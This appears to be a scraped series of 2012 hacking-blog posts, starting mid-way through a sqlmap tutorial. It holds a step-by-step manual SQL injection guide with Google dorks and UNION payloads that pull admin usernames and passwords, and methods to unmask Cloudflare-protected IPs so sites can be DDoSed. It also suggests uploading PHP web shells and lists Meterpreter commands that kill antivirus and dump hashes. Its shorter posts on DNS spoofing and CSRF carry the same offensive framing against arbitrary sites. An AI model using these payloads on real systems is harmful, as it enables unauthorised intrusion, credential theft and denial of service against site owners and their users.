nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”--tables --columns

sqlmap-tables-column


sqlmap-tables-column

(7)To Get data of particular database & Table , type following command

nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dump -D “database_name” -T “table _name”

sqlmap-dump

sqlmap-dump-data


Now , you can view all database from following directory.

/home/nirav/Downloads/sqlmapproject-sqlmap-f305dde/output

What`s next you can do?


1-Execute arbitrary Sql command on the server

This is probably the easiest thing to do on a server that is vulnerable to sql injection. The --sql-query parameter can be used to specify a sql query to execute. Things of interest would be to create a user in the users table or something similar. Or may be change/modify the content of cms pages etc.

Another parameter --sql-shell would give an sql shell like interface to run queries interactively.

2-Get inside the admin panel and play

If the website is running some kind of custom cms or something similar that has an admin panel, then it might be possible to get inside provided you are able to crack the password retrieved in the database dump. Simple and short length passwords can be broken simply by brute forcing, however long length complex passwords may not be breakable.

Check if the admin panel allows to upload some files. If an arbitrary php file can be uploaded then it be a lot greater fun. The php file can contain shell_exec, system ,exec or passthru function calls and that will allow to execute arbitrary system commands. Php web shell scripts can be uploaded to do the same thing.

3-Shell on remote OS

This is the thing to do to completely takeover the server. However note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter call --os-shell that can be used to try to get a shell on remote system, but it has many limitations of its own.

Friday, November 9, 2012

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

63 comments
All these methods are based on bad admin configurations, but still are quite common

If you want to find real I.P. address of website, which is hidden by CLOUDFLARE. It has came to my attention that many booters, hosts, malicious websites, and more use CloudFlare for DDoS Protection & Anti-Abuse Report Protection. With CloudFlare protection, it is difficult to get the hosts IP; therefore, it is difficult to send an abuse report or launch a (D)DoS attack. This simple guide will help you obtain any website protected by CloudFlare's real IP, which can be used for whatever you desire!

METHOD 1:-

If you simply ping the domain , it will give i.p. which is not website`s real i.p. address. you should try following option to get real I.P. address of domain.

ping direct-connect.domain.com

             OR

ping direct.domain.com

             OR

ping ftp.domain.com

             OR

ping cpanel.domain.com

             OR

ping mail.domain.com

METHOD 2 :-

For a Long Aged Domain you can use netcraft toolbar to check real ip

For Example

Code:

http://toolbar.netcraft.com/site_report?url=DOMAIN.COM

Clearly We can see change in IP to a cloudflare one.

METHOD 3 :-

You can try bruteforcing DNS , some subdomain will have real IP of website.

For this purpose you need NMAP tools.

Open your terminal with root privellege & type following code

# nmap -sV -sS -F <target>

it will scan host & give results , it`s not give real i.p. of website.(but from this you can know weather website is protected by CLOUDFLARE or not)

Now type following code in terminal

# nmap --script dns-brute -sn <target>

it will give you real I.P. of website.


I made simple bash script which do all things for you.For more details click here.

Cloudflare-resolver

IF all of above methods does not work ;then there is no admin misconfiguration. So you cannot find real I.P.

Wednesday, November 7, 2012

How to do SQL injection manually?

13 comments
According to Wikipedia, SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

You can also do it by using some tools ,here we are doing without use of tools.

If you want to do easily with help of tools then read my previous tutorial using HAVIJ here .

Let us have a look at the contents of this tutorial..

Part One - Website Assessment

- Finding a vulnerable website

- Determining the amount of columns

- Finding which columns are vulnerable

Part Two - Gathering Information

- Determining the SQL version

- Finding the database

Part Three - The Good Part

- Finding the table names

- Finding the column names

- Displaying the column contents

- Finding the admin page

Let us begin now.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. If you are unfamiliar with the term "dorks",

Dorks are website URLs that are possibly vulnerable. In SQL injection these dorks look like this:

Code:

inurl:page.php?id=

This will be inputted into Google's search bar and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:

Code:

http://www.thesite.com/page.php?id=1

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:

Code:

http://www.thesite.com/page.php?id=1'

or

http://www.thesite.com/page.php?id='1

After pressing enter, if this website returns an error such as the following:

Code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 5

Or something similar, this means it's vulnerable to injection.

Determining the amount of columns

If we want to use commands and get results we must know how many columns there are on a website.

To find the number of columns we write a query with incrementing values until we get an error, like this:

Code:

http://www.thesite.com/page.php?id=1 ORDER BY 1-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 2-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 3-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 4-- <---No error

http://www.thesite.com/page.php?id=1 ORDER BY 5-- <---ERROR!

This means that there are four columns!

DON'T FORGET TO INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY.

VERY IMPORTANT!

Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we will use the UNION and SELECT queries while keeping the double null (--) at the end of the string.

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,2,3,4--

Don't forget to put the extra null(-) in between the "=" sign and the value (the number).

page.php?id=-1

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4.

If we look back to the end of Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2 as an example). The command should look like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method is used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:

Code:

5.1.44-community-log

Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Finding the database

To find the database we use a query like the one below:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,concat(database()),3,4--

You now have the name of the database! Congratulations. Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Part

This is the fun part where we will find the usernames, emails and passwords!

Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!

Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s),

tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex.

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.

2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".

Hex/Char Converter

http://www.swingnote.com/tools/texttohex.php

3. Click convert.

4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon ( which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:

Code:

http://www.thesite.com/admin

http://www.thesite.com/adminlogin

http://www.thesite.com/modlogin

http://www.thesite.com/moderator

Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program

Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

How To use Websploit?

5 comments

Hey here is new tools which I found is WEBSPLOIT. First download WEBSPLOIT from here.Now install it. (it`s old article; view updated part at bottom to download latest version)

Installation process are as follow.

(1)First download WebSploit toolkit 
(2)Now unzip the file folder 
(3)Now change the permission of WebSploit file in WebSploit folder. Right click on websploit file and select properties.
(4)Select the Permission tab and click on Allow executing file as program now  click on close
(5)now open your terminal & type
    cd /Downloads/web/websploit
    ./websploit

Now open terminal and type websploit.
websploit

Saturday, November 3, 2012

How to do DNS SPOOF(tutorial)?

4 comments

First What is the DNS ? (wikipedia.org)

The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. For example, http://www.example.com translates to208.77.188.166.

What does poisoning the DNS allow us to do ?

It allows us to redirect the traffic to another website.
First This is the structure of the network :

Friday, November 2, 2012

Some of the Cool Metasploit Metrepreter script

0 comments

Getcountermeasure
Getcountermeasure is an automated script Disable security measures such as antivirus, firewall, and more.
Command:- run getcountermeasure

Getgui
getgui script is used to enable RDP on a target system.
Command:- run getgui -e

GetTelnet
gettelnet script is used to enable telnet on the victim.
Command:- run gettelnet -e

Winenum
Winenum script is used to dump tokens, hashes.
Command:- run winenum

Getlocalsubnet
getlocalsubnet script is used to get the local subnet mask of a victim.
Command:- run get local subnets

Killav
Killav used to disable most antivirus programs.
Command:- run killav

Checkvm
Checkvm used to see if you exploited a virtual machine.
Command:- run checkvm

Sunday, October 28, 2012

How to exploit CSRF vulnerability(CSRF tutorial)?

11 comments
Today, I'm going to explain you about WEB vulnerability that not everyone knows...but it very popular.This vulnerability is very dangerous and effective.Usually, the vulnerability exploiting never leave evidences.This vulnerability called: Cross Site Request Forgery(CSRF).CSRF and the way to exploit it is extremely easy; Much easier then all the complicated injections.

How does it works?

It works by forcing the slave's browser to run HTTP requests in order to implement a range of actions, for example :
  • Permission faking\stealing.
  • Transfer of funds from the Bank
  • Disruption of the normal sequence of the site
And much more.
UA-35960349-1